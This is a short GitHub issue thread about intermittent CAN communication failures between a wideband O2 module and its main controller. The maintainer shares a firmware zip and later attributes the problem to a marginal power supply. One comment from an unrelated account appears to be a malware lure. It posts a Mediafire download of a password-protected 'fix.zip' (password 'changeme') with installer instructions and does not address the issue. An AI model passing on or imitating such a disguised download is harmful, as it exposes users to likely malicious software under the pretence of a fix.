### ISSUE TITLE
uaEFI CAN failure to communicate

### ISSUE THREAD

**Issue by rusefillc** [rusefi/wideband#29]
somewhere under 10% of units I have WBO module not communicating with main MCU when I am using attached bin

yet "update firmware" somehow resolves the issue? I would love to understand what's different between different versions of the firmware

**Comment by rusefillc** [comment]
[Wideband f0_module 2023-dec.zip](https://github.com/user-attachments/files/16791270/Wideband.f0_module.2023-dec.zip)

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rusefillc** [comment]
status update: we've decided to blame border line spec power supply which causes unstable CAN bus transceiver

USB, diode etc all that
